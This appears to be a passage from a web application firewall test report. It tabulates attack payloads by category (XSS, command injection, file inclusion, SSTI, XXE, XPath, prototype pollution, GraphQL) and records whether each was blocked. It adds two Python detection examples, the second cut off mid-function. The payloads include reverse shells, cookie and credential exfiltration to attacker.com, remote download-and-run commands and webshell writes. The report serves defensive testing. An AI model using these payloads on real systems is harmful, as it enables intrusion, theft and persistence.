| 🛡️ | POST | XSS Data URI context - data:image/svg injection | data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('http://attacker.com/'+document.cookie)"/> | 403 |
| 🛡️ | POST | XSS React JSX - dangerouslySetInnerHTML bypass | <img src=x onerror=fetch('http://attacker.com/'+document.cookie)> | 403 |
| 🛡️ | POST | XSS Vue.js - v-html directive injection | <div v-html="'<img src=x onerror=fetch(http://attacker.com/'+document.cookie)>'"></div> | 403 |
| 🛡️ | POST | XSS Angular (1.x) - $sanitize bypass template injection | {{constructor.constructor('fetch(http://attacker.com/+document.cookie)')()}} | 403 |
| 🛡️ | POST | XSS Angular (2+) - DomSanitizer bypassSecurityTrustHtml | <img src=x onerror=fetch('http://attacker.com/'+document.cookie)> | 403 |
| 🛡️ | POST | XSS JSON context - close JSON string and inject | {"name":"</script><script>fetch('http://attacker.com/'+document.cookie)</script>"} | 403 |
| 🛡️ | POST | XSS PostMessage context - listener steals cross-origin messages | <script>window.addEventListener('message',function(e){new Image().src='http://attacker.com/'+btoa(e.data)})</script> | 403 |
| 🛡️ | POST | XSS DOM Clobbering - form element hijack | <form id="config"><input name="apiEndpoint" value="http://attacker.com/steal"></form><script>fetch(config.apiEndpoint.value+'?c='+document.cookie)</sc... | 403 |

4.9 command injection

  • Items: 20 | Passed: 19 | Pass rate: 95.0%

| Status | Method | Item | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | Command injection - download and run remote trojan | ; wget http://attacker.com/shell.sh -O /tmp/.x; bash /tmp/.x | 403 |
| 🛡️ | POST | Command injection - reverse shell (bash TCP) | ; bash -i >& /dev/tcp/attacker.com/4444 0>&1 | 403 |
| 🛡️ | POST | Command injection - read system password file | \| cat /etc/shadow | 403 |
| 🛡️ | POST | Command injection - write SSH public key for persistence | ; echo 'ssh-rsa AAAA...' >> ~/.ssh/authorized_keys | 403 |
| 🛡️ | POST | Command injection - pipe bypass + DNS out-of-band data | \|curl attacker.com/whoami\|\| | 403 |
| 🛡️ | POST | Command injection - backtick command exfiltrates data to attacker server | cat /etc/shadow\|base64\|curl attacker.com -d @- | 403 |
| 🛡️ | POST | Command injection - base64-encoded bypass execution | ; echo 'Y2F0IC9ldGMvcGFzc3dk' \| base64 -d \| bash | 403 |
| 🛡️ | POST | Command injection - $IFS no-space bypass to read password file | ;cat$IFS/etc/passwd | 403 |
| 🛡️ | POST | Command injection - PowerShell encoded command downloads trojan (Windows) | ; powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABw... | 403 |
| 🛡️ | POST | Command injection - wildcard bypass for command execution | ;/??n?/?at /???/????wd | 403 |
| 🛡️ | POST | Command injection - dollar-sign command substitution bypasses filter | $(cat /etc/passwd) | 403 |
| 🛡️ | POST | Command injection - Python reverse shell bypassing bash restrictions | ; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.... | 403 |
| 🛡️ | POST | Command injection - Perl reverse shell | ; perl -e 'use Socket;$i="attacker.com";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDI... | 403 |
| 🛡️ | POST | Command injection - hex-encoded keyword filter bypass | ; $(echo -e "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64") | 403 |
| 🛡️ | POST | Command injection - nc reverse shell | ; nc attacker.com 4444 -e /bin/bash | 403 |
| 🛡️ | POST | Command injection - octal-encoded keyword filter bypass | ;eval $'\143\141\164\040\057\145\164\143\057\160\141\163\163\167\144' | 403 |
| 🛡️ | POST | Command injection - DNS out-of-band exfiltration of file contents | ; for l in $(cat /etc/passwd\|base64 -w0\|fold -w63);do dig $l.attacker.com;done | 403 |
| ⚠️ | POST | Command injection - nmap internal network port scan | ; nmap -Pn -p 22,80,443,3306,6379 10.0.0.0/24 | 200 |
| 🛡️ | POST | Command injection - curl reads cloud metadata (AWS IMDSv1) | ; curl http://169.254.169.254/latest/meta-data/iam/security-credentials/admin -o /tmp/aws.txt; curl attacker.com -d @/tmp/aws.txt | 403 |
| 🛡️ | POST | Command injection - write crontab scheduled task for persistence | ; echo '* * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1' \| crontab - | 403 |

4.10 file inclusion

  • Items: 11 | Passed: 11 | Pass rate: 100.0%

| Status | Method | Item | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | LFI - php://input raw POST data code execution | php://input + Body: <?php system('id');?> | 403 |
| 🛡️ | GET | LFI - PHP wrapper reads source code (base64 bypass) | php://filter/convert.base64-encode/resource=index.php | 403 |
| 🛡️ | GET | LFI - read Linux password file | ../../../../../../../../etc/passwd | 403 |
| 🛡️ | GET | LFI - expect:// wrapper executes system command | expect://cat /etc/passwd | 403 |
| 🛡️ | GET | LFI - data:// wrapper direct command execution | data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2V0Yy9wYXNzd2QnKTs/Pg== | 403 |
| 🛡️ | GET | LFI - phar:// deserialization RCE (upload a phar file under any extension first, then trigger metadata deserialization) | phar://./uploads/evil.gif | 403 |
| 🛡️ | GET | LFI - PHP filter chain generates RCE payload (php_filter_chain_generator) | php://filter/convert.iconv.UTF8.CSISO2022KR\|convert.base64-encode\|convert.iconv.UTF8.UTF7\|convert.iconv.IBM860.UTF16\|convert.iconv.ISO-IR-143.ISO2022C... | 403 |
| 🛡️ | GET | LFI - Pearcmd.php RCE (register_argc_argv=On) | /usr/local/lib/php/pearcmd.php&+config-create+/<?=system($_GET[1])?>+/tmp/shell.php | 403 |
| 🛡️ | GET | LFI - zip:// wrapper unpacks and includes (requires a zip containing a webshell to be uploaded first) | zip://./uploads/evil.zip%23shell.php | 403 |
| 🛡️ | GET | LFI - compress.zlib:// wrapper reads stream | compress.zlib://file:///etc/passwd | 403 |
| 🛡️ | GET | LFI - Windows ADS (Alternate Data Stream) reads hidden data | c:\inetpub\wwwroot\index.php::$DATA | 403 |

4.11 directory traversal

  • Items: 12 | Passed: 12 | Pass rate: 100.0%

| Status | Method | Item | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | GET | Directory traversal - read Windows SAM registry file | ..\..\..\..\windows\system32\config\SAM | 403 |
| 🛡️ | GET | Directory traversal - read Nginx site configuration file | ../../../etc/nginx/sites-enabled/default | 403 |
| 🛡️ | GET | Directory traversal - read root user's SSH private key | ../../../../root/.ssh/id_rsa | 403 |
| 🛡️ | GET | Directory traversal - read Linux password file | ../../../../etc/passwd | 403 |
| 🛡️ | GET | Directory traversal - read web application database config file | ../../../var/www/html/config/database.php | 403 |
| 🛡️ | GET | Directory traversal - Zip Slip archive path traversal | ../../../../var/www/html/shell.php | 403 |
| 🛡️ | GET | Directory traversal - URL-encoded filter bypass | %2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd | 403 |
| 🛡️ | GET | Directory traversal - compressed backup file download | ../../../var/backups/website.tar.gz | 403 |
| 🛡️ | GET | Directory traversal - Nginx alias traversal reads sensitive files | ../aliased/../../../etc/shadow | 403 |
| 🛡️ | GET | Directory traversal - Tomcat WAR deployment directory traversal | ../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml | 403 |
| 🛡️ | GET | Directory traversal - Windows case-insensitivity bypass | ..\..\..\..\Program Files\Apache\conf\httpd.conf | 403 |
| 🛡️ | GET | Directory traversal - path normalization bypass (....//) | ....//....//....//etc/passwd | 403 |

4.12 ssti

  • Items: 18 | Passed: 18 | Pass rate: 100.0%

| Status | Method | Item | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | SSTI - Jinja2 reverse shell (Python) | {{ config.__class__.__init__.__globals__['os'].popen('bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"').read() }} | 403 |
| 🛡️ | POST | SSTI - Twig reads /etc/passwd password file (PHP) | {{ '/etc/passwd'\|file_excerpt(1, -1) }} | 403 |
| 🛡️ | POST | SSTI - Freemarker reverse shell (Java) | <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'")} | 403 |
| 🛡️ | POST | SSTI - Velocity reads shadow file (Java) | #set($x=$rt.exec("cat+/etc/shadow")) | 403 |
| 🛡️ | POST | SSTI - ERB reads database config YAML (Ruby) | <%= File.read('/var/www/html/config/database.yml') %> | 403 |
| 🛡️ | POST | SSTI - Smarty remote file include to get a shell (PHP) | {capture}{include file='http://attacker.com/shell.txt'}{/capture} | 403 |
| 🛡️ | POST | SSTI - Handlebars command execution reads SSH private key | {{#with "s" as \|string\|}}{{#with "e"}}{{#with split as \|conslist\|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with stri... | 403 |
| 🛡️ | POST | SSTI - ASP.NET Razor downloads and runs PowerShell payload | @System.Diagnostics.Process.Start("cmd.exe","/c powershell -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')") | 403 |
| 🛡️ | POST | SSTI - Mako writes SSH public key for persistence (Python) | <% import os; os.system("echo 'ssh-rsa AAAA...' >> /root/.ssh/authorized_keys") %> | 403 |
| 🛡️ | POST | SSTI - Pug/Jade reads environment variables leaking database password | #{global.process.mainModule.require('child_process').execSync('env \| grep -i pass')} | 403 |
| 🛡️ | POST | SSTI - Jinja2 filter bypass command execution (lipsum chain) | {{ lipsum.__globals__['os'].popen('cat /etc/passwd').read() }} | 403 |
| 🛡️ | POST | SSTI - Jinja2 filter bypass file read (attr/getitem chain) | {{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }} | 403 |
| 🛡️ | POST | SSTI - Tornado SSTI reads sensitive file (Python) | {% import os %}{{ os.popen('cat /etc/shadow').read() }} | 403 |
| 🛡️ | POST | SSTI - Pebble reads environment variables (Java) | {{ getClass().forName('java.lang.Runtime').getRuntime().exec('env') }} | 403 |
| 🛡️ | POST | SSTI - Nunjucks command execution reads password (Node.js) | {{ range.constructor("return global.process.mainModule.require('child_process').execSync('cat /etc/passwd')")() }} | 403 |
| 🛡️ | POST | SSTI - Thymeleaf SpringEL command execution reads AWS credentials (Java) | ${T(java.lang.Runtime).getRuntime().exec('curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ -o /tmp/aws')} | 403 |
| 🛡️ | POST | SSTI - Jinja2 iterates config.items for sensitive settings | {% for key, value in config.items() %}{% if 'SECRET' in key or 'PASS' in key %}{{ config.__class__.__init__.__globals__['os'].popen('curl http://attac... | 403 |
| 🛡️ | POST | SSTI - Mustache RCE via constructor chain | {{#constructor}}{"name":"a","prototype":{"console":{"log":"require('child_process').execSync('cat /etc/passwd')"}}}{{/constructor}} | 403 |

4.13 xxe

  • Items: 14 | Passed: 14 | Pass rate: 100.0%

| Status | Method | Item | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | XXE - read system password file | <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo> | 403 |
| 🛡️ | POST | XXE - OOB out-of-band data theft (parameter entity + external DTD) | <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/xxe.dtd">%xxe;%exfil;]><foo>test</foo> | 403 |
| 🛡️ | POST | XXE - PHP expect wrapper executes system command | <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]><foo>&xxe;</foo> | 403 |
| 🛡️ | POST | XXE - Billion Laughs denial of service | <?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol3 "&lol2;&lol2;... | 403 |
| 🛡️ | POST | XXE - read web directory listing to enumerate files | <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///var/www/">]><foo>&xxe;</foo> | 403 |
| 🛡️ | POST | XXE - Base64 encoding bypasses WAF filter | <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]><foo>&xxe;</foo> | 403 |
| 🛡️ | POST | XXE - XInclude bypasses DOCTYPE restriction | <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo> | 403 |
| 🛡️ | POST | XXE - error-based leak of file contents via error messages | <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd"><!ENTITY % wrapper "<!ENTITY send SYSTEM 'http://attacker.com/?%xxe;'>"... | 403 |
| 🛡️ | POST | XXE - SSRF port scan of internal services | <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://10.0.0.1:8080">]><foo>&xxe;</foo> | 403 |
| 🛡️ | POST | XXE - read Office Open XML file (docx/xlsx unpacked) | <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///var/www/secret.docx">]><foo>&xxe;</foo> | 403 |
| 🛡️ | POST | XXE - SVG file upload XXE reads password | <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><svg xmlns="http://www.w3.org/2000/svg">&xxe;</svg> | 403 |
| 🛡️ | POST | XXE - FTP protocol SSRF against internal FTP service | <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "ftp://admin:password@10.0.0.1/">]><foo>&xxe;</foo> | 403 |
| 🛡️ | POST | XXE - jar:// protocol reads Java application config | <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:file:///var/www/app.war!/WEB-INF/web.xml">]><foo>&xxe;</foo> | 403 |
| 🛡️ | POST | XXE - read .bash_history to steal command history | <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///root/.bash_history">]><foo>&xxe;</foo> | 403 |

4.14 ssi injection

  • Items: 12 | Passed: 12 | Pass rate: 100.0%

| Status | Method | Item | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | SSI - command execution reads password file | <!--#exec cmd="cat /etc/passwd" --> | 403 |
| 🛡️ | POST | SSI - command execution reverse shell | <!--#exec cmd="bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'" --> | 403 |
| 🛡️ | POST | SSI - include arbitrary file leaking sensitive information | <!--#include virtual="/etc/shadow" --> | 403 |
| 🛡️ | POST | SSI - file size check (blind information leak) | <!--#fsize file="/etc/shadow" --> | 403 |
| 🛡️ | POST | SSI - write webshell into web directory | <!--#exec cmd="echo '<?php system($_GET[1]);?>' > /var/www/html/shell.php" --> | 403 |
| 🛡️ | POST | SSI - download and run remote trojan | <!--#exec cmd="wget http://attacker.com/shell.sh -O /tmp/s.sh; bash /tmp/s.sh" --> | 403 |
| 🛡️ | POST | SSI - echo DOCUMENT_ROOT leaking web path | <!--#echo var="DOCUMENT_ROOT" --> | 403 |
| 🛡️ | POST | SSI - print all environment variables leaking sensitive configuration | <!--#printenv --> | 403 |
| 🛡️ | POST | SSI - ESI injection steals cookie (Edge Side Includes) | <esi:include src="http://attacker.com/steal?cookie=$(HTTP_COOKIE)"/> | 403 |
| 🛡️ | POST | SSI - ESI injection replaces page content with phishing page | <esi:include src="http://attacker.com/phish.html"/> | 403 |
| 🛡️ | POST | SSI - read database config file | <!--#exec cmd="cat /var/www/html/config/database.php" --> | 403 |
| 🛡️ | POST | SSI - variable assignment leaks sensitive information | <!--#set var="sensitive" value="$DOCUMENT_ROOT" --><!--#echo var="sensitive" --> | 403 |

4.15 xpath injection

  • Test cases: 13 | Passed: 13 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | XPath - authentication bypass with an always-true OR | `' or '1'='1` | 403 |
| 🛡️ | POST | XPath - close the expression and inject an always-true condition to bypass login | `x' or 1=1 or 'x'='y` | 403 |
| 🛡️ | POST | XPath - authentication bypass with an empty-string OR condition | `' or ''='` | 403 |
| 🛡️ | POST | XPath - blind: extract the password length | `' and string-length(//user[name/text()='admin']/password)=8 and '1'='1` | 403 |
| 🛡️ | POST | XPath - blind: guess the password one character at a time | `' and substring(//user[name/text()='admin']/password,1,1)='a' and '1'='1` | 403 |
| 🛡️ | POST | XPath - blind: guess the password with codepoints-to-string | `' and substring(//user[name/text()='admin']/password,1,1)=codepoints-to-string(97) and '1'='1` | 403 |
| 🛡️ | POST | XPath - extract the XML document structure node by node | `' and count(/*)=1 and '1'='1` | 403 |
| 🛡️ | POST | XPath - select every user node to leak all account data | `' or 1=1] \| //user[1=1` | 403 |
| 🛡️ | POST | XPath - use name() to read the current node name and map the document | `x' or name()='username' or 'x'='y` | 403 |
| 🛡️ | POST | XPath - count the attributes on the root node | `' and count(/@*)=1 and '1'='1` | 403 |
| 🛡️ | POST | XPath - blind: contains() to leak password substrings | `' and contains(../password,'a') and '1'='1` | 403 |
| 🛡️ | POST | XPath - out-of-band exfiltration via doc() to an attacker-controlled server | `' and doc('//attacker.com/x') and '1'='1` | 403 |
| 🛡️ | POST | XPath - blind: starts-with() to test the password prefix | `' and starts-with(../password,'adm') and '1'='1` | 403 |

4.16 prototype pollution

  • Test cases: 12 | Passed: 10 | Pass rate: 83.3%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | Prototype pollution - inject an admin flag through Object.prototype | `{"__proto__":{"isAdmin":true}}` | 403 |
| ⚠️ | POST | Prototype pollution - inject an admin flag through constructor.prototype | `{"constructor":{"prototype":{"isAdmin":true}}}` | 200 |
| 🛡️ | POST | Prototype pollution - nested __proto__ injection to RCE (NODE_OPTIONS) | `{"__proto__":{"shell":"node","env":{"NODE_OPTIONS":"--require /tmp/evil.js"}}}` | 403 |
| ⚠️ | POST | Prototype pollution - dotted key bypassing a JSON.parse-level filter (obj prefix) | `{"obj.__proto__.status":"admin"}` | 200 |
| 🛡️ | POST | Prototype pollution - Lodash merge injecting an AST for RCE | `{"constructor":{"prototype":{"type":"Program","body":[{"type":"ExpressionStatement","expression":{"type":"CallExpression","callee":{"type":"Identifier...` | 403 |
| 🛡️ | POST | Prototype pollution - jQuery $.extend deep merge injecting properties | `{"__proto__":{"shell":"/bin/bash","NODE_OPTIONS":"--eval require('child_process').execSync('curl attacker.com/$(cat /etc/passwd\|base64)')"}}` | 403 |
| 🛡️ | POST | Prototype pollution - merge function injecting a child_process environment variable for RCE | `{"__proto__":{"env":{"EVIL":"require('child_process').execSync('id')"}}}` | 403 |
| 🛡️ | POST | Prototype pollution - polluted path property leading to arbitrary file read | `{"__proto__":{"path":"/etc/passwd"}}` | 403 |
| 🛡️ | POST | Prototype pollution - overriding exports.main to execute malicious code | `{"__proto__":{"main":"/tmp/evil.js"}}` | 403 |
| 🛡️ | POST | Prototype pollution - injecting env properties to hijack environment variables | `{"__proto__":{"env":{"AWS_ACCESS_KEY_ID":"stolen","DATABASE_URL":"postgres://stolen"}}}` | 403 |
| 🛡️ | POST | Prototype pollution - deeply nested bracket path (mongoose-style) | `{"a[b][__proto__][isAdmin]":"true"}` | 403 |
| 🛡️ | POST | Prototype pollution - JSON5-style payload to evade detection | `{"__proto__":{"polluted":true}}` | 403 |
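
The two misses in this table share a cause worth checking against any rule set: a rule keyed on the literal JSON key `"__proto__"` blocks the first row but neither `constructor.prototype` (second row) nor a dotted key such as `obj.__proto__.status`, which a qs/body-parser style parser expands into a path later (fourth row). The Python check below is an added example written for this report, not JXWAF's rule logic: it decodes the body and walks every key as a path, flagging a `__proto__` segment or a `constructor` segment directly followed by `prototype`. The payloads in it are copied from the table; `naive_check` is an assumption about the shape of rule that produced the two misses.

```python
"""Structural prototype-pollution check for JSON request bodies.

Added example for this report; it is not JXWAF's rule engine. The payloads
below are copied from the prototype pollution table; naive_check() models the
kind of literal-key rule that would explain the two misses (an assumption).
"""
import json
import re

# Splits 'a[b][__proto__][isAdmin]' or 'obj.__proto__.status' into segments,
# mirroring how qs/body-parser style parsers expand nested keys.
PATH_SPLIT = re.compile(r"[.\[\]]+")

# Copied from the table above (untruncated rows only).
TABLE_PAYLOADS = [
    '{"__proto__":{"isAdmin":true}}',                  # blocked (403)
    '{"constructor":{"prototype":{"isAdmin":true}}}',  # missed (200)
    '{"__proto__":{"shell":"node","env":{"NODE_OPTIONS":"--require /tmp/evil.js"}}}',
    '{"obj.__proto__.status":"admin"}',                # missed (200)
    '{"__proto__":{"path":"/etc/passwd"}}',
    '{"__proto__":{"main":"/tmp/evil.js"}}',
    '{"a[b][__proto__][isAdmin]":"true"}',
    '{"__proto__":{"polluted":true}}',
]


def key_segments(key: str) -> list[str]:
    """'a[b][__proto__]' -> ['a', 'b', '__proto__']; 'x.y' -> ['x', 'y']."""
    return [s for s in PATH_SPLIT.split(key) if s]


def find_pollution(obj, path=()) -> list[str]:
    """Return the key paths in a decoded JSON value that would reach
    Object.prototype, via a __proto__ segment or constructor -> prototype."""
    hits = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            segs = key_segments(str(key))
            full = list(path) + segs
            if "__proto__" in segs:
                hits.append(".".join(full))
            else:
                # Only report pairs completed by this key, so that
                # {"constructor":{"prototype":...}} is reported once.
                start = max(len(path) - 1, 0)
                for i in range(start, len(full) - 1):
                    if full[i] == "constructor" and full[i + 1] == "prototype":
                        hits.append(".".join(full))
                        break
            hits.extend(find_pollution(value, tuple(full)))
    elif isinstance(obj, list):
        for i, item in enumerate(obj):
            hits.extend(find_pollution(item, path + (str(i),)))
    return hits


def is_polluting(body: str) -> bool:
    """True when the JSON body contains a prototype-reaching key path."""
    try:
        doc = json.loads(body)
    except ValueError:
        return False
    return bool(find_pollution(doc))


def naive_check(body: str) -> bool:
    """A literal-key rule: matches the exact token '"__proto__"' only.
    Assumed here as the rule shape that blocks row 1 and misses rows 2 and 4."""
    return '"__proto__"' in body


def compare(payloads=TABLE_PAYLOADS) -> dict[str, tuple[bool, bool]]:
    """Map each payload to (naive_check result, structural result)."""
    return {p: (naive_check(p), is_polluting(p)) for p in payloads}


if __name__ == "__main__":
    for payload, (naive, structural) in compare().items():
        print(f"naive={naive!s:5} structural={structural!s:5} {payload}")
```

The structural walk also rejects bracket-path keys like `a[b][__proto__][isAdmin]`, which the literal-key rule happens to catch only because the token `__proto__` appears inside the quoted key; a key written as `a[b][__proto__ ][isAdmin]` with a stray space would slip past that rule but not past the segment check.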

4.17 xslt injection

  • Test cases: 12 | Passed: 12 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | XSLT - read the system password file | `<xsl:value-of select="unparsed-text('/etc/passwd')"/>` | 403 |
| 🛡️ | POST | XSLT - PHP wrapper executing a system command | `<xsl:value-of select="php:function('system','cat /etc/shadow')"/>` | 403 |
| 🛡️ | POST | XSLT - Java Runtime executing a system command to read passwd | `<xsl:value-of select="Runtime:getRuntime():exec('cat /etc/passwd')"/>` | 403 |
| 🛡️ | POST | XSLT - .NET Process.Start command execution | `<xsl:value-of select="user:Process.Start('cmd.exe','/c whoami')"/>` | 403 |
| 🛡️ | POST | XSLT - XXE file read of /etc/passwd | `<!DOCTYPE xsl:stylesheet [<!ENTITY passwd SYSTEM "file:///etc/passwd">]><xsl:value-of select="&passwd;"/>` | 403 |
| 🛡️ | POST | XSLT - document() SSRF against the cloud metadata endpoint | `<xsl:value-of select="document('http://169.254.169.254/latest/meta-data/')"/>` | 403 |
| 🛡️ | POST | XSLT - file write (EXSLT exsl:document) | `<exsl:document href="/var/www/html/xslt.php" method="text"><?php system($_GET[1]);?></exsl:document>` | 403 |
| 🛡️ | POST | XSLT - document() port scan of internal services | `<xsl:value-of select="document('http://10.0.0.1:3306')"/>` | 403 |
| 🛡️ | POST | XSLT - Java processor reading Java system properties | `<xsl:value-of select="system-property('java.version')"/>` | 403 |
| 🛡️ | POST | XSLT - .NET loading an external stylesheet for code injection | `<xsl:include href="http://attacker.com/evil.xslt"/>` | 403 |
| 🛡️ | POST | XSLT - read /root/.bash_history | `<xsl:value-of select="unparsed-text('/root/.bash_history')"/>` | 403 |
| 🛡️ | POST | XSLT - processor fingerprinting (xsl:vendor) followed by PHP command execution | `<xsl:value-of select="system-property('xsl:vendor')"/><xsl:value-of select="php:function('system','id')"/>` | 403 |

4.18 graphql injection

  • Test cases: 12 | Passed: 1 | Pass rate: 8.3%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| ⚠️ | POST | GraphQL - introspection dumping the full schema (all types and fields) | `{__schema{types{name,fields{name,type{name,kind}}}}}` | 200 |
| ⚠️ | POST | GraphQL - __type query fetching a single type definition to leak sensitive fields | `{__type(name:"User"){name,fields{name,type{name,kind,ofType{name,kind}}}}}` | 200 |
| ⚠️ | POST | GraphQL - introspection dumping mutation operations (data-modification entry points) | `{__schema{mutationType{name,fields{name,args{name,type{name,kind}}}}}}` | 200 |
| ⚠️ | POST | GraphQL - deeply nested query for resource-exhaustion DoS | `{user{posts{comments{author{posts{comments{author{posts{comments{content}}}}}}}}}}` | 200 |
| ⚠️ | POST | GraphQL - batching attack: many login attempts in one request to bypass rate limiting | `[{"query":"mutation{login(username:\"admin\",password:\"admin123\"){token}}"},{"query":"mutation{login(username:\"admin\",password:\"password\"){token...` | 200 |
| ⚠️ | POST | GraphQL - aliases to brute-force a login in one request, bypassing rate limiting | `{m1:login(p:"1"){t} m2:login(p:"2"){t} m3:login(p:"3"){t} m4:login(p:"4"){t} m5:login(p:"5"){t}}` | 200 |
| ⚠️ | POST | GraphQL - introspection dumping all directive definitions (security policy leak) | `{__schema{directives{name,description,locations,args{name,description}}}}` | 200 |
| ⚠️ | POST | GraphQL - field-suggestion abuse to enumerate hidden fields | `{__schema{types{name}}} {user(id:1){name,NOTEXIST}}` | 200 |
| 🛡️ | POST | GraphQL - SQL injection through a GraphQL argument to dump the database | `{user(id:"1' UNION SELECT username,password FROM users--"){name,email}}` | 403 |
| ⚠️ | POST | GraphQL - mutation creating an admin account (privilege escalation) | `mutation{addUser(name:"hacker",email:"hacker@evil.com",role:"admin"){id,name,role}}` | 200 |
| ⚠️ | POST | GraphQL - NoSQL injection through a GraphQL argument to dump all users | `{user(id:"{\"$gt\":\"\"}"){name,email,password}}` | 200 |
| ⚠️ | POST | GraphQL - introspection dumping subscription operations (real-time channels) | `{__schema{subscriptionType{name,fields{name,type{name,kind,ofType{name,kind}}}}}}` | 200 |
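
Eleven of twelve GraphQL cases passed the WAF, and most of them are not string-pattern problems: introspection, query depth, alias fan-out and batching are properties of the query shape, so a check has to look at braces, aliases and the JSON envelope rather than at keywords. The Python checker below is an added example for this report, not JXWAF's detection code. The limits (depth 6, 3 aliases per field, 5 operations per batch) and the constructed batch body are assumptions made for the example; the query strings are copied from the table. Two of the misses are left unflagged on purpose: `mutation{addUser(... role:"admin")}` is a well-formed request whose legitimacy depends on the caller's authorization, which no body inspection can decide, and the `$gt` case is caught only by a heuristic operator pattern.

```python
"""Request-shape checks for GraphQL bodies: introspection, depth, aliases, batching.

Added example for this report, not JXWAF's rule logic. LIMITS are illustrative.
TABLE_QUERIES are copied from the graphql injection table above; BATCH_BODY is
constructed for this example because the table's batch row is truncated.
"""
import json
import re
from collections import Counter

LIMITS = {"depth": 6, "aliases": 3, "batch": 5}

INTROSPECTION = re.compile(r"(?<!\w)__(?:schema|type)\b")
# alias:field( or alias:field{ ; evaluated on text with string literals blanked
ALIAS = re.compile(r"(?<!\w)(\w+)\s*:\s*(\w+)\s*[({]")
# MongoDB-style operators smuggled inside an argument (heuristic only)
NOSQL_OPERATOR = re.compile(r"\$(?:gt|gte|lt|lte|ne|in|nin|regex|where|exists)\b")

TABLE_QUERIES = [
    '{__schema{types{name,fields{name,type{name,kind}}}}}',
    '{__type(name:"User"){name,fields{name,type{name,kind,ofType{name,kind}}}}}',
    '{__schema{mutationType{name,fields{name,args{name,type{name,kind}}}}}}',
    '{user{posts{comments{author{posts{comments{author{posts{comments{content}}}}}}}}}}',
    '{m1:login(p:"1"){t} m2:login(p:"2"){t} m3:login(p:"3"){t} m4:login(p:"4"){t} m5:login(p:"5"){t}}',
    '{__schema{directives{name,description,locations,args{name,description}}}}',
    '{__schema{types{name}}} {user(id:1){name,NOTEXIST}}',
    'mutation{addUser(name:"hacker",email:"hacker@evil.com",role:"admin"){id,name,role}}',
    r'{user(id:"{\"$gt\":\"\"}"){name,email,password}}',
    '{__schema{subscriptionType{name,fields{name,type{name,kind,ofType{name,kind}}}}}}',
]
BATCH_BODY = json.dumps([{"query": "{me{id}}"}] * 6)  # constructed


def strip_strings(query: str) -> str:
    """Blank the contents of "..." literals (honouring backslash escapes) so
    braces and colons inside arguments do not skew the other checks."""
    out, in_str, i = [], False, 0
    while i < len(query):
        ch = query[i]
        if in_str:
            if ch == "\\":
                i += 2          # skip the escaped character
                continue
            if ch == '"':
                in_str = False
                out.append(ch)
        else:
            if ch == '"':
                in_str = True
            out.append(ch)
        i += 1
    return "".join(out)


def max_depth(query: str) -> int:
    """Maximum selection-set nesting, counting braces outside string literals."""
    depth = best = 0
    for ch in strip_strings(query):
        if ch == "{":
            depth += 1
            best = max(best, depth)
        elif ch == "}":
            depth -= 1
    return best


def alias_counts(query: str) -> Counter:
    """How many aliases target each field, e.g. {m1:login(...) m2:login(...)}."""
    return Counter(field for _alias, field in ALIAS.findall(strip_strings(query)))


def analyze(body: str, limits=LIMITS) -> list[str]:
    """Findings for one HTTP body: a raw query, a {"query": ...} object, or a batch array."""
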